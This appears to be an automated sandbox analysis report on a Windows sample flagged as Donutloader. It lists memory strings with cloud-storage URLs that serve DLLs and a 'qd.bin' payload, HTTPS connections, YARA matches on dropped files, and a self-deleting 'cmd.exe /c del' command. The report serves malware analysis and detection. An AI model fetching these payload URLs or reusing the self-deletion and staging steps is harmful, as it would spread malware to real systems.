Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/Q
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/WITd
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/YmNhYj
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/beijing.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldll.
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dlldllJ
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllIONx_
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldlln
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllx
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dllhing
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlllp
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlls
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409531560.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1409440913.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcr120.dlltP
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllA
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1472994046.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllJ
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllV
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dlln
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1436909329.0000000000D65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllx
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/verse
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1508631410.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcls
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/;
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/X
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Y
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/w
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll/kdll-1323571269.cos.ap-beijin
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dll4
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllZ
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dlll
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1545465793.0000000000D62000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllx
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1714454232.0000000004895000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://www.globalsign.com/repository/0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/)
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/:
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/m
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bin;
Source: LisectAVT_2403002B_185.exeString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binC:
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.bing
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binh
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binre.myqcloud.com
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1600540407.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.1711974357.0000000000D52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwwqd-1323571269.cos.ap-singapore.myqcloud.com/qd.binw
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 53539 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53540 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53539
Source: unknownNetwork traffic detected: HTTP traffic on port 53538 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53538
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53540
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTPS traffic detected: 82.156.94.45:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 82.156.94.13:443 -> 192.168.2.7:53539 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.7:53540 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShellJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShellJump to behavior

System Summary

barindex
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.1711974357.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05A9E9B80_3_05A9E9B8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_05A9E9900_3_05A9E990
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C42C00_3_034C42C0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C645C0_3_034C645C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C8C540_3_034C8C54
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C519C0_3_034C519C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C55780_3_034C5578
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_3_034C59A80_3_034C59A8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_004820A00_2_004820A0
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0048D1D90_2_0048D1D9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_004913AD0_2_004913AD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_004936840_2_00493684
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0048C9DD0_2_0048C9DD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_0047FE5A0_2_0047FE5A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: String function: 0047A740 appears 54 times
Source: LisectAVT_2403002B_185.exeStatic PE information: invalid certificate
Source: LisectAVT_2403002B_185.exeStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: msvcp120.dll.0.drStatic PE information: No import functions for PE file found
Source: msvcp120[1].dll.0.drStatic PE information: No import functions for PE file found
Source: msvcp120.dll.0.drStatic PE information: Data appended to the last section found
Source: msvcp120[1].dll.0.drStatic PE information: Data appended to the last section found
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.0000000003878000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1713418065.0000000003821000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1610744814.00000000077BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1610848262.00000000077C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1715048646.00000000058ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exe.MUIj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.1716593820.0000000007846000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.1610871084.00000000077D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs LisectAVT_2403002B_185.exe
Source: LisectAVT_2403002B_185.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1711974357.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\qd[1].bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: C:\Program Files (x86)\Everything\4.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: classification engineClassification label: mal88.evad.winEXE@5/19@4/3
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Program Files (x86)\EverythingJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\msvcr120[1].dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ojgxwqf.5ph.ps1Jump to behavior
Source: LisectAVT_2403002B_185.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exeJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeSection loaded: winhttp.dllJump to behavior
